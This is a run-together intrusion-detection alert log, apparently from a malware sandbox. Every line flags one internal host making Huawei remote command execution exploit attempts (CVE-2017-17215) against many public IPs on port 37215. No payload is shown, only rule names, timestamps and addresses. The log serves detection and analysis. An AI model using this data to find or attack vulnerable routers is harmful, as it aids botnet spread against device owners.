                                                    07/10/24-08:26:45.651870TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3459037215192.168.2.1441.237.195.224
                                                    07/10/24-08:26:11.144714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5443037215192.168.2.14157.227.252.63
                                                    07/10/24-08:26:15.844473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5151837215192.168.2.1441.196.150.177
                                                    07/10/24-08:27:02.776043TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3511437215192.168.2.14197.80.218.205
                                                    07/10/24-08:26:33.220659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4333837215192.168.2.1441.242.176.238
                                                    07/10/24-08:26:59.554660TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3789837215192.168.2.14197.14.89.124
                                                    07/10/24-08:26:26.603545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5841637215192.168.2.14197.208.112.192
                                                    07/10/24-08:26:42.427094TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4633037215192.168.2.1441.168.192.18
                                                    07/10/24-08:27:27.096599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5995437215192.168.2.1441.154.252.205
                                                    07/10/24-08:26:43.594845TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4094237215192.168.2.14197.10.243.223
                                                    07/10/24-08:27:02.928138TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3277437215192.168.2.14157.184.185.27
                                                    07/10/24-08:26:28.918557TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5341837215192.168.2.14197.240.98.71
                                                    07/10/24-08:26:14.822403TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5414837215192.168.2.14157.228.89.26
                                                    07/10/24-08:27:10.772266TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4134837215192.168.2.14157.155.153.12
                                                    07/10/24-08:26:20.158539TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3569837215192.168.2.14157.124.16.213
                                                    07/10/24-08:26:43.814052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3607637215192.168.2.14197.112.77.162
                                                    07/10/24-08:27:23.870319TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3438837215192.168.2.14197.121.166.14
                                                    07/10/24-08:26:59.848690TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4823637215192.168.2.14197.183.70.87
                                                    07/10/24-08:27:02.949584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5754437215192.168.2.14157.55.83.94
                                                    07/10/24-08:26:55.421781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4860637215192.168.2.1441.23.198.61
                                                    07/10/24-08:27:07.356650TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5099437215192.168.2.14197.166.206.95
                                                    07/10/24-08:26:59.703676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5398037215192.168.2.14157.58.155.54
                                                    07/10/24-08:27:20.484132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3630637215192.168.2.1441.53.199.120
                                                    07/10/24-08:26:48.000164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4055637215192.168.2.14157.221.189.1
                                                    07/10/24-08:27:32.610394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4933437215192.168.2.14157.71.77.4
                                                    07/10/24-08:26:28.773956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5923437215192.168.2.1467.120.114.140
                                                    07/10/24-08:27:17.018335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6045437215192.168.2.14197.98.167.183
                                                    07/10/24-08:26:45.647337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5060037215192.168.2.14157.177.200.150
                                                    07/10/24-08:26:41.455036TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3972237215192.168.2.14197.220.182.108
                                                    07/10/24-08:26:43.721021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4866037215192.168.2.14143.59.66.128
                                                    07/10/24-08:27:11.537934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3407237215192.168.2.1482.65.163.11
                                                    07/10/24-08:27:11.538879TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3840037215192.168.2.1492.251.81.133
                                                    07/10/24-08:26:15.852897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3764837215192.168.2.14157.255.10.72
                                                    07/10/24-08:27:02.870791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5036037215192.168.2.14197.186.124.74
                                                    07/10/24-08:27:14.845795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4004437215192.168.2.14157.0.153.148
                                                    07/10/24-08:26:17.978087TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5050637215192.168.2.1441.87.219.125
                                                    07/10/24-08:27:13.978919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3479037215192.168.2.14153.250.115.20
                                                    07/10/24-08:27:23.490419TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3599637215192.168.2.14157.254.197.154
                                                    07/10/24-08:27:31.530342TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4982037215192.168.2.1441.109.52.93
                                                    07/10/24-08:26:48.004841TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5770637215192.168.2.1497.101.96.201
                                                    07/10/24-08:26:17.969206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3492037215192.168.2.14197.250.82.5
                                                    07/10/24-08:26:59.880494TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3731637215192.168.2.14197.151.7.214
                                                    07/10/24-08:27:10.723777TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5025237215192.168.2.14157.223.210.119
                                                    07/10/24-08:27:05.128414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4530237215192.168.2.14197.224.89.230
                                                    07/10/24-08:27:24.976551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3328037215192.168.2.14197.214.125.103
                                                    07/10/24-08:26:45.623992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4481037215192.168.2.14197.43.16.237
                                                    07/10/24-08:27:05.087235TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3965437215192.168.2.14197.223.243.162
                                                    07/10/24-08:27:11.537934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3281837215192.168.2.14157.122.85.107
                                                    07/10/24-08:26:26.594913TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5192637215192.168.2.14197.120.17.106
                                                    07/10/24-08:27:32.612334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5204437215192.168.2.14157.104.114.128
                                                    07/10/24-08:26:43.779855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4070437215192.168.2.14197.208.128.124
                                                    07/10/24-08:26:55.308630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4759437215192.168.2.14157.250.46.59
                                                    07/10/24-08:26:33.204295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4531237215192.168.2.14157.169.74.158
                                                    07/10/24-08:26:43.798286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4333637215192.168.2.1441.223.69.223
                                                    07/10/24-08:27:07.281440TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5270437215192.168.2.1487.120.153.188
                                                    07/10/24-08:27:22.853545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3652037215192.168.2.14197.212.190.180
                                                    07/10/24-08:27:33.759873TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5064037215192.168.2.1442.223.234.115
                                                    07/10/24-08:27:07.310052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5867437215192.168.2.1441.110.38.93
                                                    07/10/24-08:26:52.005613TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4445037215192.168.2.14157.72.231.43
                                                    07/10/24-08:27:23.953433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5247437215192.168.2.1441.166.178.163
                                                    07/10/24-08:27:32.614607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3402437215192.168.2.14157.120.232.105
                                                    07/10/24-08:26:59.637493TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3691837215192.168.2.14197.157.125.33
                                                    07/10/24-08:26:41.507616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3698037215192.168.2.14157.1.76.225
                                                    07/10/24-08:27:23.896326TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5839637215192.168.2.1441.148.177.99
                                                    07/10/24-08:26:28.911510TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5739837215192.168.2.14157.224.243.197
                                                    07/10/24-08:27:11.490604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4222637215192.168.2.14157.197.112.120
                                                    07/10/24-08:26:51.957475TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4093837215192.168.2.1459.19.127.100
                                                    07/10/24-08:26:47.749012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4560437215192.168.2.1441.65.239.94
                                                    07/10/24-08:26:49.837904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5448037215192.168.2.1441.255.39.201
                                                    07/10/24-08:26:17.961786TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3388437215192.168.2.14197.174.136.210
                                                    07/10/24-08:27:11.522078TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3368237215192.168.2.14157.175.68.237
                                                    07/10/24-08:27:30.417770TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5744237215192.168.2.1441.82.82.100
                                                    07/10/24-08:26:30.989816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3640237215192.168.2.14218.173.31.190
                                                    07/10/24-08:27:23.507926TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5056237215192.168.2.14165.33.234.197
                                                    07/10/24-08:27:05.164336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5091237215192.168.2.1437.111.142.157
                                                    07/10/24-08:26:45.611390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3317637215192.168.2.1441.68.22.232
                                                    07/10/24-08:26:11.493465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4067637215192.168.2.1414.126.26.250
                                                    07/10/24-08:27:02.899276TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5222437215192.168.2.14193.4.84.235
                                                    07/10/24-08:26:29.790374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4232037215192.168.2.14157.125.221.9
                                                    07/10/24-08:26:41.462014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3434837215192.168.2.14197.173.224.254
                                                    07/10/24-08:26:11.198321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3926237215192.168.2.14197.225.60.127
                                                    07/10/24-08:26:41.356142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3996437215192.168.2.1441.240.79.129
                                                    07/10/24-08:26:11.105620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6050837215192.168.2.1441.70.199.121
                                                    07/10/24-08:26:43.728156TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4894437215192.168.2.14159.146.34.188
                                                    07/10/24-08:26:52.035646TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3330837215192.168.2.1441.169.134.75
                                                    07/10/24-08:27:33.946859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5403437215192.168.2.14197.16.47.77
                                                    07/10/24-08:27:20.494991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4839237215192.168.2.14201.103.175.167
                                                    07/10/24-08:27:02.825346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5371837215192.168.2.1441.3.222.217
                                                    07/10/24-08:26:11.127756TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3730037215192.168.2.1441.216.51.31
                                                    07/10/24-08:27:34.127270TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4580237215192.168.2.14197.47.139.208
                                                    07/10/24-08:26:28.927122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4268237215192.168.2.14197.22.12.249
                                                    07/10/24-08:26:13.694603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5487437215192.168.2.1495.155.239.144
                                                    07/10/24-08:27:02.767297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4203837215192.168.2.14143.157.0.165
                                                    07/10/24-08:26:29.849428TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5493637215192.168.2.1441.86.209.231
                                                    07/10/24-08:27:32.614607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4909037215192.168.2.1441.72.223.23
                                                    07/10/24-08:26:14.623254TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5020037215192.168.2.14197.2.78.1
                                                    07/10/24-08:26:20.126065TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5624037215192.168.2.1438.32.95.106
                                                    07/10/24-08:26:14.828942TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4253037215192.168.2.14197.30.134.164
                                                    07/10/24-08:27:20.519262TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5772237215192.168.2.14157.108.236.28
                                                    07/10/24-08:26:13.845798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5471837215192.168.2.1441.197.135.27
                                                    07/10/24-08:27:07.369832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4963037215192.168.2.14197.164.218.187
                                                    07/10/24-08:26:13.833960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4971237215192.168.2.14197.25.166.127
                                                    07/10/24-08:26:14.816680TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5899437215192.168.2.14157.17.199.191
                                                    07/10/24-08:26:14.819021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5087837215192.168.2.14197.236.188.222
                                                    07/10/24-08:27:02.993548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3472037215192.168.2.1499.251.221.108
                                                    07/10/24-08:27:02.847593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4292837215192.168.2.1432.231.119.42
                                                    07/10/24-08:26:22.218292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5816237215192.168.2.1457.149.104.202
                                                    07/10/24-08:26:55.408073TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5732437215192.168.2.14157.86.130.124
                                                    07/10/24-08:26:29.813463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4361437215192.168.2.14157.178.33.185
                                                    07/10/24-08:26:34.208952TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4132037215192.168.2.14197.129.81.99
                                                    07/10/24-08:26:47.854499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4795237215192.168.2.14167.2.232.48
                                                    07/10/24-08:27:05.111278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5619037215192.168.2.14140.151.227.89
                                                    07/10/24-08:27:10.604407TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5183837215192.168.2.14157.48.13.244
                                                    07/10/24-08:26:11.452655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4390237215192.168.2.14221.191.119.202
                                                    07/10/24-08:26:33.175812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5892437215192.168.2.1437.244.202.183
                                                    07/10/24-08:26:22.223907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3607437215192.168.2.14157.225.211.146
                                                    07/10/24-08:26:38.609336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3695237215192.168.2.14197.17.43.52
                                                    07/10/24-08:26:41.583277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4524437215192.168.2.14197.115.91.150
                                                    07/10/24-08:26:59.632292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3517837215192.168.2.14157.209.95.103
                                                    07/10/24-08:27:27.164034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5789637215192.168.2.14157.173.126.71
                                                    07/10/24-08:27:13.815716TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4396437215192.168.2.14197.27.43.224
                                                    07/10/24-08:27:08.389862TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4063637215192.168.2.14197.144.85.68
                                                    07/10/24-08:27:31.479319TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4377637215192.168.2.14150.61.190.106
                                                    07/10/24-08:26:33.259774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3565037215192.168.2.14157.47.144.216
                                                    07/10/24-08:27:24.975422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5632637215192.168.2.14207.166.50.75
                                                    07/10/24-08:27:30.409560TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5973237215192.168.2.1441.149.34.89
                                                    07/10/24-08:26:53.199768TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5607237215192.168.2.1436.171.119.143
                                                    07/10/24-08:27:05.129654TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5496637215192.168.2.1441.171.128.229
                                                    07/10/24-08:27:03.035788TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5254237215192.168.2.14157.6.46.245
                                                    07/10/24-08:26:36.425818TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5244437215192.168.2.14197.99.138.26
                                                    07/10/24-08:26:43.574763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5229037215192.168.2.14216.72.196.123
                                                    07/10/24-08:27:19.168887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5053437215192.168.2.14197.1.3.12
                                                    07/10/24-08:26:38.586951TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3880237215192.168.2.14197.136.66.202
                                                    07/10/24-08:26:28.878894TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4452437215192.168.2.14157.22.76.64
                                                    07/10/24-08:27:24.993210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4357437215192.168.2.1418.180.247.13
                                                    07/10/24-08:27:19.307932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4375437215192.168.2.14197.163.243.229
                                                    07/10/24-08:26:31.093186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3419837215192.168.2.1441.84.145.208
                                                    07/10/24-08:27:10.717127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3632237215192.168.2.14197.23.84.128
                                                    07/10/24-08:27:19.267667TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5117437215192.168.2.14197.159.83.151
                                                    07/10/24-08:26:41.499571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4680437215192.168.2.14157.181.22.201
                                                    07/10/24-08:27:17.020582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4107437215192.168.2.14161.102.27.73
                                                    07/10/24-08:26:36.421240TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5500437215192.168.2.1441.83.129.244
                                                    07/10/24-08:27:13.752380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4860637215192.168.2.14180.77.147.166
                                                    07/10/24-08:27:34.136895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4709237215192.168.2.1441.200.23.38
                                                    07/10/24-08:27:22.898943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3610237215192.168.2.14157.107.25.126
                                                    07/10/24-08:27:30.532382TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4066637215192.168.2.14157.119.124.234
                                                    07/10/24-08:26:28.835620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4009237215192.168.2.14197.107.250.228
                                                    07/10/24-08:27:14.875220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3531837215192.168.2.14197.118.210.128
                                                    07/10/24-08:26:22.290742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3674437215192.168.2.1431.92.44.246
                                                    07/10/24-08:26:28.637197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3609437215192.168.2.14157.53.198.183
                                                    07/10/24-08:26:41.429574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4060637215192.168.2.14157.205.89.157
                                                    07/10/24-08:26:55.330413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6064037215192.168.2.1441.248.76.204
                                                    07/10/24-08:27:02.977576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3589837215192.168.2.14197.32.228.215
                                                    07/10/24-08:26:28.923936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5441637215192.168.2.1441.174.30.131
                                                    07/10/24-08:26:36.424272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3355437215192.168.2.14157.72.129.56
                                                    07/10/24-08:26:42.177272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4853637215192.168.2.1441.176.37.62
                                                    07/10/24-08:26:11.596894TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5257037215192.168.2.1441.159.106.191
                                                    07/10/24-08:26:55.444062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4070837215192.168.2.14157.162.81.184
                                                    07/10/24-08:27:32.621614TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3776637215192.168.2.14197.75.151.213
                                                    07/10/24-08:26:23.356986TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4198037215192.168.2.1441.136.42.166
                                                    07/10/24-08:26:41.517379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3457637215192.168.2.14197.80.254.135
                                                    07/10/24-08:26:13.851265TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3589637215192.168.2.14157.18.54.92
                                                    07/10/24-08:26:29.852071TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4033437215192.168.2.1441.227.58.186
                                                    07/10/24-08:26:51.924375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5603237215192.168.2.14157.182.200.77
                                                    07/10/24-08:26:11.595599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3464837215192.168.2.14157.198.75.20
                                                    07/10/24-08:26:31.046774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4333637215192.168.2.1417.184.85.117
                                                    07/10/24-08:26:38.638682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5964637215192.168.2.1441.33.43.133
                                                    07/10/24-08:27:02.898056TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3739837215192.168.2.1441.205.182.248
                                                    07/10/24-08:26:33.179431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5791437215192.168.2.14157.20.23.26
                                                    07/10/24-08:27:32.540139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3873837215192.168.2.14197.144.26.84
                                                    07/10/24-08:26:47.909610TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4104037215192.168.2.14156.24.26.218
                                                    07/10/24-08:26:47.992323TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5352037215192.168.2.14157.151.65.186
                                                    07/10/24-08:27:02.838823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4378237215192.168.2.14197.64.105.51
                                                    07/10/24-08:26:18.003273TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4620437215192.168.2.1441.174.25.12
                                                    07/10/24-08:26:33.243184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5544637215192.168.2.14197.101.182.235
                                                    07/10/24-08:27:28.148356TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3923437215192.168.2.1486.23.184.255
                                                    07/10/24-08:26:25.514525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3785037215192.168.2.14197.102.127.168
                                                    07/10/24-08:27:30.444942TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3521037215192.168.2.1441.130.17.136
                                                    07/10/24-08:26:11.088418TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4637237215192.168.2.14197.140.67.38
                                                    07/10/24-08:27:33.831803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4631837215192.168.2.1441.225.109.57
                                                    07/10/24-08:26:43.526771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5184037215192.168.2.14157.99.102.235
                                                    07/10/24-08:26:59.834726TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3688237215192.168.2.14151.2.94.236
                                                    07/10/24-08:26:43.524057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3874637215192.168.2.14157.75.66.86
                                                    07/10/24-08:27:13.965572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5435037215192.168.2.14114.85.129.43
                                                    07/10/24-08:26:38.645835TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3311037215192.168.2.14203.150.45.30
                                                    07/10/24-08:26:49.859169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3863237215192.168.2.14197.51.89.208
